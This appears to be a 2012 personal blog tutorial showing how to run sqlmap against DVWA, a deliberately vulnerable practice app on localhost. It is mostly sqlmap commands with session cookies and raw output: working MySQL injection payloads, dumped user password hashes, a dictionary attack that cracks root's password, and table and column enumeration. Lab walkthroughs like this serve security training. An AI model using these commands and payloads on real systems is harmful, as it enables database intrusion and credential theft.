Daftar Blog Saya

Rabu, 01 Februari 2012

Dump DVWA with sqlmap

Dump DVWA with sqlmap
1.active your apche and mysql in backtrack aplication
2.open your browser n type localhost/dvwa

change DWVA security

and input a variable. and look the tamper data.



3. and now open the sqlmap and input syntax
python ./sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=l4l6eh61c4vtc7mjqnj189ggo2; PHPSESSID=7bbjfskvr64lg12ik2t1guomf6" --string="Surname" --users --passwords

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 11:21:05

[11:21:05] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:21:05] [INFO] resuming injection data from session file
[11:21:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:21:05] [INFO] testing connection to the target url
[11:21:05] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 1886 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,122,122,58),(SELECT (CASE WHEN (1886=1886) THEN 1 ELSE 0 END)),CHAR(58,115,112,111,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cprL'='cprL&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,110,122,122,58),IFNULL(CAST(CHAR(98,119,97,110,113,73,98,73,78,69) AS CHAR),CHAR(32)),CHAR(58,115,112,111,58))# AND 'rzLh'='rzLh&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'vxgo'='vxgo&Submit=Submit
---

[11:21:05] [INFO] manual usage of GET payloads requires url encoding
[11:21:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:21:05] [INFO] fetching database users
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'builder32'
[*] 'root'@'localhost'

[11:21:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[11:21:08] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[11:21:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[11:21:18] [INFO] starting dictionary attack (mysql_passwd)
[11:21:20] [INFO] found: 'root' for user: 'root'                                                                                                                                              
database management system users password hashes:                                                                                                                                             
[*] debian-sys-maint [1]:
    password hash: *8C4C424D182238AFBA8B217F692D07C952EF4087
[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root

[11:22:34] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 11:22:34

python ./sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=l4l6eh61c4vtc7mjqnj189ggo2; PHPSESSID=7bbjfskvr64lg12ik2t1guomf6" -D dvwa --tables

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 11:47:21

[11:47:21] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:47:21] [INFO] resuming injection data from session file
[11:47:21] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:47:21] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 1886 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,122,122,58),(SELECT (CASE WHEN (1886=1886) THEN 1 ELSE 0 END)),CHAR(58,115,112,111,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cprL'='cprL&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,110,122,122,58),IFNULL(CAST(CHAR(98,119,97,110,113,73,98,73,78,69) AS CHAR),CHAR(32)),CHAR(58,115,112,111,58))# AND 'rzLh'='rzLh&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'vxgo'='vxgo&Submit=Submit
---

[11:47:21] [INFO] manual usage of GET payloads requires url encoding
[11:47:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:47:21] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[11:47:21] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 11:47:21

python ./sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; Xplico=l4l6eh61c4vtc7mjqnj189ggo2; PHPSESSID=7bbjfskvr64lg12ik2t1guomf6" -D dvwa --columns

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 11:50:11

[11:50:11] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:50:11] [INFO] resuming injection data from session file
[11:50:11] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:50:11] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 1886 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,122,122,58),(SELECT (CASE WHEN (1886=1886) THEN 1 ELSE 0 END)),CHAR(58,115,112,111,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cprL'='cprL&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(CHAR(58,110,122,122,58),IFNULL(CAST(CHAR(98,119,97,110,113,73,98,73,78,69) AS CHAR),CHAR(32)),CHAR(58,115,112,111,58))# AND 'rzLh'='rzLh&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'vxgo'='vxgo&Submit=Submit
---

[11:50:11] [INFO] manual usage of GET payloads requires url encoding
[11:50:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:50:11] [INFO] fetching tables for database: dvwa
[11:50:11] [INFO] read from file '/pentest/database/sqlmap/output/localhost/session': dvwa, guestbook, dvwa, users
[11:50:11] [INFO] fetching columns for table 'guestbook' on database 'dvwa'
[11:50:11] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user       | varchar(15) |
| user_id    | int(6)      |
+------------+-------------+

Database: dvwa
Table: guestbook
[3 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| comment    | varchar(300)         |
| comment_id | smallint(5) unsigned |
| name       | varchar(100)         |
+------------+----------------------+

[11:50:11] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at: 11:50:11




1 komentar: